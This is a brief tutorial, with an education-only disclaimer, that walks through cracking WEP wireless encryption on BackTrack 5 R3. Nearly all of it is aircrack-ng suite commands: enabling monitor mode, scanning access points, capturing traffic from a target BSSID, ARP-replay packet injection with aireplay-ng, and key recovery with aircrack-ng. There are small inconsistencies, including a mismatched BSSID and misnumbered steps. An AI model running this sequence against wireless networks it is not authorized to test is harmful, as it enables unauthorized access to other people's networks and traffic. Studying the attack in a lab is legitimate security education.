This document outlines six steps to exploit WEP flaws using BackTrack 5 R3: 1. Start the wireless interface in monitoring mode and list all wireless access points, attached hosts, operating channels, and encryption methods. 2. Set the monitor interface to the same channel as the target access point. 3. Use airodump-ng to capture packets from the target access point and write them to a file, specifying the BSSID, channel, and output file. 4. Use aireplay-ng to inject packets and, from the output of step 3, select a connected host or wait for one to connect. Run steps 4-5-6 simultaneously on different terminals to crack the WEP

1. Exploit WEP Flaws in six steps using BackTrack 5 R3
Disclaimer
I provide this document for education purpose without any
responsibility of any illegal use
Prerequisites
1. Backtrack 5 r3
2. Wireless interface compatible with backtrack
a. Check this list http://www.aircrackng.org/doku.php?
id=compatibility_drivers
Scope of this document is WEP
1-Start wireless interface in monitoring mode
airmon-ng start wlan0
2-list all wireless APs, hosts attached to them, their operating
channels and encryption methods
airodump-ng mon0
3-you must set the monitor interface mon0 on the same channel as
access point
iwconfig mon0 channel 11
4-airodump-ng --bssid 00:16:01:AE:21:64 --channel 11
--write wepcarack222demo mon0
00:16:01:AE:21:69 is AP address obtained from step 2

2. wepcarack222demo output file name
channel obtained from 2
5- From step 4 select connected host or wait for any if none
aireplay-ng -3 -b 00:16:01:AE:21:64 -h F0:D1:A9:F0:34:6C
mon0
6-aircrack-ng wepcarack222demo-03.cap
Steps 4-5-6 must be on different terminal simultaneously
Any questions drop an email to mohammedomar@yahoo.com